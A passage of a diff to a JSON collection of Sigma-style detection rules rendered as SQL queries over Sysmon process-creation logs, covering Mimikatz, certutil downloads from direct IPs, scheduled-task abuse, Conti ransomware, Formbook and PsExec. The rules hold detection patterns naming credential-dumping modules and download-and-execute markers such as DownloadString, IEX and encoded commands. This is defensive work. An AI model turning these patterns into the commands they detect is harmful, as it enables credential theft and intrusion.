'\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\'))" ], - "filename": "image_load_susp_uncommon_image_load.yml" + "filename": "proc_creation_win_sdiagnhost_susp_child.yml" }, { - "title": "Suspicious UltraVNC Execution", - "id": "871b9555-69ca-4993-99d3-35a59f9f3599", + "title": "HackTool - Mimikatz Execution", + "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", "status": "test", - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. 
startup (as seen being used by Gamaredon threat group)", - "author": "Bhabesh Raj", + "description": "Detection well-known mimikatz command line arguments", + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_ultravnc_susp_execution.yml" + "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" }, { - "title": "Suspicious File Execution From Internet Hosted WebDav Share", - "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", - "status": "experimental", - "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious Rundll32 Activity Invoking Sys File", + "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", + "status": "test", + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" + "filename": "proc_creation_win_rundll32_sys.yml" }, { - "title": "Renamed PAExec Execution", - "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", - "status": "test", - 
"description": "Detects execution of renamed version of PAExec. Often used by attackers", - "author": "Florian Roth (Nextron Systems), Jason Lynch", + "title": "Mshtml DLL RunHTMLApplication Abuse", + "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "status": "experimental", + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + }, + { + "title": "CMSTP Execution Process Creation", + "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. 
Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\paexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmstp.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_paexec.yml" + "filename": "proc_creation_win_cmstp_execution_by_creation.yml" }, { - "title": "PUA - Radmin Viewer Utility Execution", - "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "title": "ZOHO Dctask64 Process Injection", + "id": "6345b048-8441-43a7-9bed-541133633d7a", "status": "test", - "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", - "author": "frack113", + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 
'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_radmin.yml" + "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Execution", - "id": "93bbde78-dc86-4e73-9ffc-ff8a384ca89c", + "title": "Suspicious Add Scheduled Command Pattern", + "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "status": "experimental", - "description": "Detects execution of known compromised version of 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate usage of 3CXDesktopApp" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((OriginalFileName = '3CXDesktopApp.exe' OR Image LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' OR Product = '3CX Desktop App') AND FileVersion LIKE '%18.12.%' ESCAPE '\\') OR ((Hashes LIKE '%SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA%' ESCAPE '\\' OR Hashes LIKE '%MD5=BB915073385DD16A846DFA318AFA3C19%' ESCAPE '\\' OR Hashes LIKE '%MD5=08D79E1FFFA244CC0DC61F7D2036ACA9%' ESCAPE '\\' OR Hashes LIKE '%MD5=4965EDF659753E3C05D800C6C8A23A7A%' ESCAPE '\\' OR Hashes LIKE '%SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203%' ESCAPE '\\' OR Hashes LIKE '%SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB%' ESCAPE '\\' OR Hashes LIKE '%SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5%' ESCAPE '\\' OR Hashes LIKE '%MD5=9833A4779B69B38E3E51F04E395674C6%' ESCAPE '\\' OR Hashes LIKE '%MD5=704DB9184700481A56E5100FB56496CE%' ESCAPE '\\' OR Hashes LIKE '%MD5=8EE6802F085F7A9DF7E0303E65722DC0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E%' ESCAPE '\\' OR Hashes LIKE '%MD5=F3D4144860CA10BA60F7EF4D176CC736%' ESCAPE '\\' OR Hashes LIKE '%MD5=0EEB1C0133EB4D571178B2D9D14CE3E9%' ESCAPE '\\') OR sha256 IN ('DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC', '54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02', 'D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE', 'FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405', '5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734', 'A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203', 'AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868', 
'59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983') OR sha1 IN ('480DC408EF50BE69EBCF84B95750F7E93A8A1859', '3B43A5D8B83C637D00D769660D01333E88F5A187', '6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA', 'E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1', '8433A94AEDB6380AC8D4610AF643FB0E5220C5CB', '413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5', 'BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA', 'BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E') OR md5 IN ('BB915073385DD16A846DFA318AFA3C19', '08D79E1FFFA244CC0DC61F7D2036ACA9', '4965EDF659753E3C05D800C6C8A23A7A', '9833A4779B69B38E3E51F04E395674C6', '704DB9184700481A56E5100FB56496CE', '8EE6802F085F7A9DF7E0303E65722DC0', 'F3D4144860CA10BA60F7EF4D176CC736', '0EEB1C0133EB4D571178B2D9D14CE3E9'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE 
'\\')))" ], - "filename": "proc_creation_win_malware_3cx_compromise_execution.yml" + "filename": "proc_creation_win_schtasks_susp_pattern.yml" }, { - "title": "SafeBoot Registry Key Deleted Via Reg.EXE", - "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "title": "Renamed Mavinject.EXE Execution", + "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", - "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", + "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((Image LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_delete_safeboot.yml" + "filename": "proc_creation_win_renamed_mavinject.yml" }, { - "title": "PowerShell Base64 Encoded Shellcode", - "id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", - "status": "stable", - "description": "Detects Base64 encoded Shellcode", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File 
Downloaded From Direct IP Via Certutil.EXE", + "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", + "status": "experimental", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.t1027" 
@@ -6786,18 +6616,18 @@ "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR CommandLine LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_shellcode.yml" + "filename": "proc_creation_win_certutil_download_direct_ip.yml" }, { - "title": "Potential PsExec Remote Execution", - "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", - "status": "experimental", - "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Formbook Process Creation", + "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "status": "test", + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. 
We avoid false positives by excluding all parent process with command line parameters.", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.resource_development", "attack.t1587.001" 
@@ -6807,90 +6637,86 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" + "filename": "proc_creation_win_malware_formbook.yml" }, { - "title": "Regsvr32 Anomaly", - "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", - "status": "experimental", - "description": "Detects various anomalies in relation to regsvr32.exe", - "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "title": "Potential Conti Ransomware Activity", + "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "status": "test", + "description": "Detects a specific command used by the Conti ransomware group", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - "car.2019-04-002", - "car.2019-04-003" + "attack.impact", + 
"attack.s0575", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' 
ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_anomalies.yml" + "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" }, { - "title": "HackTool - LocalPotato Execution", - "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", + "title": "HackTool - Quarks PwDump Execution", + "id": "0685b176-c816-4837-8e7b-1216f346636b", "status": "experimental", - "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "cve.2023.21746" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN 
('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" ], - "filename": "proc_creation_win_hktl_localpotato.yml" + "filename": "proc_creation_win_hktl_quarks_pwdump.yml" }, { - "title": "Renamed Sysinternals Sdelete Execution", - "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "status": "experimental", - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution via CL_Invocation.ps1", + "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", + "status": "test", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "System administrator usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": 